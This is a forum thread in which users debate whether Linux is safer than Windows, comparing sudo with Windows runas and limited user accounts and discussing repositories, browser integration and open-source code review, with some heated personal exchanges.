Are Linux and it's variants "Malware Proof"?

I dont know much about repositories but I guess you mean that a user never will encounter malware when installing from the "repositories"?
Yes, Linux are not as targeted as windows is, but let us for the sake of argument say that the two OS´s have the same threat picture.
If I install a software, lets say strip poker for linux that I got from mail, that has a hidden trojan. I must use sudo to install it, right?
When I use sudo command, does the installer only have access to limited, unnessecary parts of linux during the install? so even if it has a malware it can not do anything bad to linux when installing with sudo? or has the software you´re installing root access if it is coded to use it?
If it has full access to linux kernel or whatever, how does it differ, security wise, from "runas" in Windows LUA?

So, what you are saying really is that Linux is not much safer than Windows LUA when installing with sudo? It´s all up to the common sense of the user, regardless of which OS you run?

Are you talking about windows LUA when you say drive-by scripts?

I dont mean to insult any linux users, I really want to know if there is difference between sudo and "runas".

I ran Gutsy Gibbon for a couple of months, I really liked the new interface, but got a bit discouraged since it was very slow on my machine (maybe its just Ubuntu distro that is slow?), compared to Vista with all the fancy stuff turned on. Even when I did a clean install in a dedicated partition. And a couple of software that I just like too much didnt have any replacements yet.
I sure will try it again with new versions when they optimised the code.

 

Hello,

Single user - there's little difference. But that's the point. Windows is a single-user environment. Linux is a multi-user environment. That's where the power of root / sudo really comes to play.

People always talk about desktop as an example. They forget servers that control huge networks with hundreds and thousands of computers. Imagine they were all admins - like in Windows.

Or imagine they were all LUA - show me one company that works with Windows as LUA. I have worked and interacted with following companies, never seen one Windows PC that is not a full admin - General Electric, IBM, Toshiba, Philips, Marconi, Galileo, to name a few.

Back to desktop:
When you grant root permission to the user - most often yourself - you defeat the separation mechanism. Sometimes, this is necessary. But on a setup, working system, you don't need root. And setting up standard user account in Linux is a billion times easier and more effective / compatible than Windows LUA.

And yes, Linux is safer than Windows LUA. That's because of the modularity.

Windows GUI, IE etc are built into kernel. Linux kernel is completely modular. You can strip it down to 5MB!!!! GUI is optional. Shells are optional. Mail is optional. FTP is optional. And so forth.

You can build a system like lego and no part will make the house crumble. In Windows, a completely unrelated dll bug in software X will cause a system wide problem because some obscure program reads .wmf files when paint is invoked through telnet... or something like that.

But I'll say again - nothing defeats the user's determination to cause damage. Nothing. This must be taken into account when considering passive / active security.

The chance for active damage are equal in both os ... the chance for passive damage is much lower in Linux.

Finally, malware. Where you gonna get it? Official repo? No different than downloading windows update and discover it's been hacked. The same likelihood. If you go for download sites on the web, you have the source code and the hashes, reducing the chance of malware even further.

Plus, Windows updates go for Windows / MS only, no other apps. So you're less safe if you don't update constantly all your 76 applications. For example, java, flash plugin, acrobat reader, to name a few. In Linux distros, you get system wide updates.

As to Gutsy running slower - that's strange. Linux is usually significantly faster than any contemporary Windows on the same hardware, especially Vista. But you could have configured it very wrongly to make it happen.

Mrk

 

Unless the repositories are compromised, yes. They can be viewed as the Linux equivalent of Windows Update in that they normally deliver "trusted" code.

First you would have to make the attachment executable using chmod. Then you would need to run it and without sudo or admin access, it would be very limited in what it could do to your system (unless it was able to exploit an escalation of privilege vulnerability in other software or poorly set permissions on your system).

Sudo allows the command affected root access which means it can do anything - just like Administrator access in Windows.

Sudo specifically offers root access, RunAs can be used with any other user account in Windows (though Admin is the most likely use). You obviously should exercise the same care with sudo and su that you would with RunAs on Windows systems.

There are architectural differences that make Linux/Unix more secure than Windows (no equivalent of Windows' DLL injection for modifying other running processes, no possibility of a Shatter attack, no central Registry containing critical system settings) but the most important reasons are that applications are not integrated into the OS (like Internet Explorer is in Windows) which means that, as long as users take sensible configuration decisions (not running unsecured servers, not using weak account passwords), they won't be compromised without some action on their part (like installing a trojan manually).

Windows by default requires more work to secure (though XP SP2 improved greatly on this, it still requires some work) but it does require the use of third party software (though much of this is available free). With Linux, there is far less in the way of third party security tools so you could argue that a properly secured Windows system (with process protection/execution control, a top-end firewall, a registry monitor) can be more secure, assuming the user knows how to use their security tools.

 

Sukarof, as with any OS, as soon as you give a process full control (admin - root privilege) that's pretty much it.

But a compromised browser, IM, etc. does not mean a compromised OS, that i have learned. That's what Mrk means by modularity.
The OS was built like that from the start, everything is not dependent on anything. Windows was built the other way: they added LUA on a permissive OS.

Solcroft, your attitude is pretty amazing..
1- You admit you do NOT know GNU/Linux - proven here for sure, you really don't have a clue.
2- You started using LUA yesterday
3- these posts

I have plenty of links to provide, but not to you, and not here. You have the worst possible attitude. You want information? GOOGLE IT. But i think you're NOT looking for information.

Now i know why the other guy said he doesn't care about these discussions.

 

Thanks all for your explanations. I understand a bit more now.

Yeah, I was a bit surprised too. I did let ubuntu udate all that it wanted. I probably did something wrong coz I do realize that Windows is bit bloated compared to Linux. I figured that since Vista runs really fast on my machine, the speed of ubuntu would blow me off my chair I didnt have any problems with the Beryl interface, it ran very smoothly and fast with the Qube and wobbly windows (just love them ). It was the program starts and the boot process that took surprisingly long time imo when comparing to Windows. Maybe the boot process was slow because I had to use LILO since GRUB just wouldnt start ubuntu at all.
But next time I install it I will read even more howto´s.

 

I installed Ubunto 7.10 (Gutsy Gibbon) on one of my hard drives and I can see that I have a whole new learning curve to experience (I don't mind).

I found the XP LUA to be too restrictive and ended up running under Admin all the time- I'll retry suDown.

 

I realize this is off the topic but.....

Will standard linux drivers such as the ATI drivers downloaded from the ATI website work on this linux variant (ubuntu 7.10)?

 

I suggest those having unaccepptable issues with Ubuntu. To try the PCLOS LiveCD. Link in sig.

 

@Paranoid2000: Well written posts as always Paranoid. I enjoy reading them and it clearly shows the difference between experts and us happy users regarding how to explain in a straightforward way

/C.

 

Don't be surprised if you see some apps loading slowly... I have found that it varies wildly from distro to distro. I've seen Firefox load as fast as 1 second and as slow as about 5 or 6 seconds... I doubt you've misconfigured anything, it could just be that your PC doesn't like Ubuntu. Ubuntu runs well for me, one of the better ones though, but your PC is your PC. I'd try several of the major distros to get a better feel for things. My overall impression after trying out over a dozen distros is that Linux and Win are about the same speedwise.. I don't see one beating the other really... Win2k is faster for me than XP. And I've seen some snappy and some sluggish Linux distros too. Same applies to boot times also...

So I guess the moral of the story is: Try many till you find a good one..

 

This would mean that no process has any authority to compromise the integrity of any other process. Why does this sound like Windows LUA to me?

So it seems that your argument is that Windows is less secure, because you have to waste 60 seconds of your time to setup an LUA in Windows.

Any idiot could've guessed, and just in case you still think you're making some sort of groundbreaking observation, I admitted as much freely and explicitly.

I can probably waste 60 seconds explaining to you why making this assumption is both stupid and wrong, but I'll just give you the short answer and say, "no, I didn't."

If you say so.

The only strange thing is that, until now, there hasn't been a single shred of credible evidence that Linux is safer than Windows in this thread. There have been allegations, and there have been explanations why Linux is safe, but there has been no credible evidence why Linux is safer than Windows.

Linux is modular. In Windows you can disable unneeded services, and you have SRP and NTFS access permissions. Linux has software repositories aka trusted software sources, so does Windows. Linux is safe, yada yada. But so what, and how do these factor into the equation? The critical question has not been answered, and continues to be dodged. And if you like to pretend you're withholding some critical, groundbreaking information, then so be it.

What a coincidence, so do I.

 

You should have figured it out by now, that this principle isn't OS specific..
But what i really meant was that there isn't an Internet Explorer up its arse

It seems you didn't understand.

You see, "any idiot"? Calm down. Notice "You admit".

No i'm not stupid, i know what i'm saying.

Disabling services, while reducing risks, doesn't have anything to do with what we're talking about.
And if you keep looking for evidence of Win vs Linux in here, that means you are not looking for info.
This discussion revolves around "Are Linux and it's variants "Malware Proof"?", which the answer is the same for any OS, no. If you're an admin to your own computer, you ultimately install what you want.

Solcroft this is the last reply. What you didn't understand is your own fault.

 

Exactly. The ability to strip administrative rights from the user and prevent them from accessing critical system resources isn't specific to Linux, it's available to Windows as well. People claim all the time that reduced privileges means Linux is safer; how can it be safer based on this feature, when Windows has the same as well? At best one can conclude that they're equally safe, simple as that.

This is a very common misconception. IE is not a part of Windows.

In very basic and largely inaccurate terms, what typically happens when the stereotypical IE security flaw gets exploited is that a trojan horse is downloaded and executed without the user's knowledge, or the user is subversively redirected to a malicious website they didn't intend to visit. The second type of attack has nothing to do with whether the OS is secure, it's the browser. Firefox has had its share of security flaws as well in this regard. The first type of attack, again, has nothing to do with the OS. If the OS is properly hardened, any malware that executes this way will find itself in a very unfriendly environment for propagation and/or causing damage.

To reiterate, in this case, it has nothing to do with the OS, it's the browser. The browser comes bundled with the OS, just like the text editor, media player and disk defragmenter did, but it's not part of the OS – circumcise it from Windows, and you'll find that your computer continues working like nothing happened. And even then, IE7 is quite secure when fully updated, and not necessarily more vulnerable than Firefox, Opera, Safari or whatnot.

Yes, I admit. I have no problems doing that. I'm waiting to see credible evidence to prove a claim that Linux supporters seem to believe is a fundamental truth. I've yet to see any such evidence.

No, you don't. You have no idea of the duration of time I've been using Windows LUA for, and I'm perfectly comfortable with holding to my opinion that you're stupid for claiming I've only started using it yesterday, and then proceeding to state that you know what you're saying. The fact that you don't know how long I've used LUA for is an extremely simple one, and if you don't understand that, it's your own fault.

If that doesn't, then neither do any of the discussion regarding Linux's modularity, software repositories, yada yada.

The Linux supporters are expounding on Linux's security. And I'm giving a few examples on how Windows can provide an equal, if not superior, amount of security. If they're willing to actually discuss the actual question of why Linux is safer than Windows, then I'll do the same. In fact, it's what I hope will happen. But unfortunately they sidestep the question and choose to discuss Linux' security features without addressing the actual question, perhaps in the hope that newbies and the inexperienced will have the wool properly fleeced over their eyes. And when I try to set the record straight that Windows has its own methods of security as well, I am accused of talking about something irrelevant. That's a very biased accusation.

The Linux supporters are here, out to defend what seems to them a fundamental truth of the universe. And unfortunately this is all they have to offer, along with the empty ultimatum that their inability to back up their claims means I should look elsewhere to prove myself wrong.

The same to you, my good sir.

 

Many Linux forums suggest that the home Linux user does not need a firewall. Is this true?

Just wondering why are there so many Linux variants?

 

I don't really know if that's totally true, but the easiest way to handle the whole issue is to just use a cheap NAT router in front of the machine and then you never have to worry about it anymore... Win or Linux...

 

Supposedly, Ubuntu by default has all ports closed. Since I am behind a router/fw, I have never had the need to check this.

 

Someone around here is pulling everyones chain and he is rather crafty about it.

 

I have recently started to use Linux at work and I also think that with the default settings it is safer than Windows. On the other hand, any knowledgeable user can go to lengths/the extreme to harden things onself but that is not what most users do (or know how to do). For example

- with a new XP PC and a new Linux PC it will be easier for someone to delete system files inside the GUI (e.g. Windows Explorer vs. Konqueror).

- IE is the default web browser in Windows and more websites target it out there. I have already heard that argument about IE is the most popular web browser and is thus targeted more and so on. But if a user is a novice, he/she probably will find it a bit difficult to "uninstall" IE from Windows. Thus the average user will be more "exposed" to threats on the web when using Windows.

- Linux patches get out more frequently than in Windows (normally once a month). Open source softwares (including the Linux kernel) tend to be reviewed by more people in the public.

 

Really think so? I think it's a ringer or prop situation myself.

 

By default, important system files are marked as hidden, and will not show up in Windows Explorer. Furthermore, really critical system files are hidden by another setting that must be turned on independently. If some of these files are deleted or modified, winlogon.exe steps in with an alert that these files have been modified and prompts you to insert your Windows installation CD to replace the files with a good copy. Under LUA, you have absolutely no permissions to modify those files in any way.

Again, by default, system files are marked as hidden and invisible to the user. I don't know how it can be "easier" to delete them than in Linux under default settings, when it's impossible to do so without changing the default settings.

The fact that IE is 'integrated' into the OS has no impact on its security. A leaky, poorly-coded browser is a leaky browser whether it's 'separated' from the OS or otherwise.
http://blogs.msdn.com/dmassy/archive/2005/03/22/400689.aspx

Another popular myth. Just because many people can review the code doesn't necessarily mean it's safer, because not everyone reviewing the code are the good guys.

That advice holds for Linux as well. Simple fact: most modern applications include update notification and/or automatic update features – including Java, Flash and Acrobat Reader, to name a few. Since it seems that Linux is just as likely to be as vulnerable without updates, no, I cannot see how this shows Linux is more secure.

These actions are also blocked by a Windows LUA. The specific APIs for dll injection, memory access, driver loading etc are blocked. A process running in LUA has zero chance of gaining ring0 privileges or accessing the OS kernel unless you use "Run as" with an admin account on it. A limited user has no write access to the Program Files/Windows/other users' settings' folders, nor to the HDD boot sector. System-wide settings are blocked from being modified. The user is only allowed to write into his/her own HKU hive in the registry, and blocked from the HLKM hive. As far as I can see, these restrictions are pretty similar to what you describe, and I cannot see how Linux's architectural differences make it more secure – equally secure, maybe, but not more.

Requires more work to secure: Fresh out of the box, the only truly vulnerable component of a copy of unupdated Windows is IE6. By default, the built-in firewall will deny remote access to all services except Remote Assistance, unless you explicitly allow access to other services. By far the quickest way of securing a fresh copy of Windows XP is to setup an LUA, and install either a sandboxing program (to sandbox IE6) or a third-party browser – that's all you actually need to remain malware-free. I highly doubt this is "much more work" than needs to be done on Linux; even if Linux came secure right out of the box, I wouldn't call installing either Sandboxie or Opera "much more work". Of course there is much more you can do with Windows if you want to take additional precautions (group policies, NTFS access permissions, other third-party security software which are strictly optional), but what I've described is the minimum requirement to reliably remain malware-free.

Does require the use of third party software: Not really. XP includes its own firewall, process execution control and access restrictions. If something really does go snafu, delete your limited user account and create a new one. Third-party software are the most popular method to secure Windows, but far from a necessity.

 

As far as I know, LUA is not by default on Windows XP, 2000, NT, ME, 9x. If I am a GUI user, I can quite easily highlight the wrong file (even folder) and delete it (and I had done this more than once in the past). In Linux, by default you cannot delete files say in /, etc. This is especially problematic when you can delete files/folders from C:\ (and downward, e.g. c:\program files, autoexec.bat).

By default IE is the browser in Windows and if it is already targeted (and exploited more) by web pages, then will it be a bigger risk to Windows users than Linux users in general? Linux does not have IE and folks also acknowledge that both Linux and non-IE browsers are targeted less by hackers (due to the so called less popularity). Does this already imply that default web browsing is safer in Linux than in Windows? Or maybe now people can theorize that non IE browsers such as Firefox in Linux is less secure than IE and thus the above does not matter.

Personally, I think more people examining source code is not a bad thing. Would MS regret not having more folks reviewed the code that led to the infamous .WMF exploit? Why would MS have so-called "security initiative" and reviewed Windows supposedly from top to bottom since then (with more "eyes")? Just like folks can comment on different opinions/ideas here despite their intentions because people can make up their own minds afterwards. People can decide what to accept/reject and so do code maintainers that receive feedbacks from others. Also, will it help well-known security analysts to have an easier time if the source code is publicly available? You can certainly say that bad guys can access the same source code but I tend to believe there are more good folks out there. So the advantage outweighs the risk.

As I said before, there can be many things done by users in Windows to do this and that but that is "not by default" in so many versions/flavors of Windows (except Vista). By default means no adding of security programs and tweaking. I already learned from here the myriads of security programs avaiable at my fingertips but they will not likely be what the average Joe or Jane will be spending their time on. Who is going to set up an LUA for grandma or grandpa after they get a new Windows PC for Christmas?

Cheers.

 

No need to since it´s pre-installed with Vista using UAC so they are already restricted users.

/C.

 

All I can say is that I've been using Linux almost constantly since the middle of August. I have no real time AV, no anti Spyware of any sort, no HIPS, no sandbox, no firewall for most of the time, nothing like PS or Returnil and GNU/Linux is running like a champ. I know that I wouldn't venture out into the www. for five minutes in a Windows Box that was so attired, to do so would be madness and would bring ruin in a matter of moments.

If this isn't a testimony to the inherent strength of Linux, I don't know what else is.

Cheers all.

 

You're right; it isn't. However, autoexec.bat is hidden by default, meaning it's quite impossible for you to click on it "by accident". If you tried to delete the Program Files folder, Windows pops up a dialog telling you "renaming, moving or deleting this folder could make some programs not work". It will also prompt you for every hidden, system and read-only file in that folder. And, after all that trouble, you can recover it from the Recycle Bin if you want to.

I'm sure that everyone accidentally deletes important files in C:\ on an often enough basis for this issue to actually matter in the wider scheme of things (a.k.a. outside the scope of nitpicking for the sake of nitpicking). And all this trouble is when you already have administrator access rights. More difficult than "accidentally" elevating your privileges and zapping those files in Linux? You tell me.

No, what I'm saying is that browser security and OS security have nothing to do with each other. The browser can be vulnerable (if left unpatched), and the OS can remain secure irregardless. Vulnerabilities in IE6 do not compromise the OS if the OS itself is properly secured, contrary to popular belief. This is not a discussion of old, unpatched IE6 vs newest, latest version of Firefox, this is a discussion of whether Linux or Windows is more secure.

There's a major difference. Microsoft's code would be reviewed by trusted white hats who do so for the sake of improving the software's security. Linux's would be reviewed by anyone who wants to, who doesn't necessarily have the end users' best interests at heart.

Also, just so you know, the wmf exploit was blocked right on day zero by DEP; yes, even with administrator privileges enabled. With LUA, the exploit is effectively worthless, since its purpose was to download and execute arbitrary malicious code that wouldn't have done much in LUA.

That's more of an emotional statement based on your personal bias than a proven, factual one.

You seem extraordinarily determined to keep the debate to the states of Windows and Linux when they're fresh out of the box, default state, and unmodified, where Windows is old and unpatched and where Linux is up-to-date with the latest updates. I suspect this is because you sorely need these conditions to be in place in order for you to have anything to talk negatively about Windows. If you are willing to spend 60 seconds to create a Limited User Account in Windows, you'll find that all your arguments just become null and void.

Everyone, if they're smart. It's quick, painless, and effective. I fully recommend everyone do it, and introduce this excellent defense mechanism as a very user-friendly solution for less-experienced users.

My own experiences with it have been positive. My parents and sister use it (though they don't know it), and even though they swap removable media all the time at their grossly-infected school/uni networks, they've remained clean for the better part of a year, as verified by Kaspersky's and Eset's online scanners (10 months, to be exact). Another recent experience I've had was a friend asking me to help secure his PC for him, because he was leaving for Sydney for his internship and will have to share his PC with others. He's been there for two months, and it's good news so far.

You seem to believe it's some zealously overcomplicated concept, and your inexperience with it shows.